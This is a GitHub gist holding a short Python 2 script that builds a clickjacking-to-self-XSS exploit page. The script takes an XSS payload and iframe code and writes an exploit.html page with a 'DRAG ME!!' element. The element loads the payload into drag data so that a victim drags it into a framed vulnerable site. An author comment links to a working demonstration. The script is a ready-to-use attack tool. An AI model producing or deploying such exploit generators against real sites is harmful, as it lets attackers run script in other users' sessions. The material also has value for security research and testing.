Skip to content

Instantly share code, notes, and snippets.

@vishwaraj101
Last active March 11, 2023 16:13
Show Gist options
  • Save vishwaraj101/340435945e61027009133b4e11283750 to your computer and use it in GitHub Desktop.
Save vishwaraj101/340435945e61027009133b4e11283750 to your computer and use it in GitHub Desktop.
clickjack to xss poc
print "Clickjack to Xss"
vector=raw_input('xss vector--> ') #xss payload
html=raw_input('Custom Iframe Code--> ') #custom iframe code
fo=open('exploit.html','w') #creating html file
source_code="""<html><body>
<h1>Clickjack to exploit self xss </h1>
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div>
"""%(vector)
fo.write(source_code)
fo=open('exploit.html','a')
fo.write(html)
fo.write('</body></html>')
fo.close() #closing the file
print "file created"
@vishwaraj101
Copy link
Author

You can see working Poc here Blog link

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment